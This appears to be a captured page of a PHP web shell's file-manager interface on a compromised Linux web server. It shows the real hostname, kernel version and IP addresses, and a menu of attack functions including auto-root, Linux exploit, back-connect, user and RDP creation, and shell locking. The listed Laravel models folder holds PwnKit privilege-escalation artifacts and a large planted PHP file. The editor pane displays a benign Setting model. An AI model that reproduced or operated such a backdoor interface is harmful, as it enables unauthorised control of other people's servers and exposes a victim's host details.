Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.217.20
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo17.com /
app /
Models /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
Account.php
827
B
-rw-rw-rw-
Asset.php
392
B
-rw-rw-rw-
Business.php
705
B
-rw-rw-rw-
Category.php
334
B
-rw-rw-rw-
Loan.php
567
B
-rw-rw-rw-
Party.php
189
B
-rw-rw-rw-
ReceivablePayable.php
722
B
-rw-rw-rw-
Setting.php
1.03
KB
-rw-rw-rw-
Transaction.php
1.05
KB
-rw-rw-rw-
TransactionLine.php
445
B
-rw-rw-rw-
User.php
2.13
KB
-rw-rw-rw-
goat1.php
143.87
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Setting.php
<?php namespace App\Models; use Illuminate\Database\Eloquent\Model; class Setting extends Model { protected $fillable = ['key', 'value']; public static function value(string $key, ?string $default = null): ?string { return static::where('key', $key)->value('value') ?? $default; } public static function put(string $key, ?string $value): void { static::updateOrCreate(['key' => $key], ['value' => $value]); } public static function publicSettings(): array { return [ 'app_name' => static::value('app_name', 'AC Software'), 'tagline' => static::value('tagline', 'Automatic double-entry accounting'), 'logo_path' => static::value('logo_path'), 'favicon_path' => static::value('favicon_path'), 'primary_color' => static::value('primary_color', '#067647'), 'accent_color' => static::value('accent_color', '#1d4ed8'), 'timezone' => static::value('timezone', config('app.timezone', 'UTC')), ]; } }
Close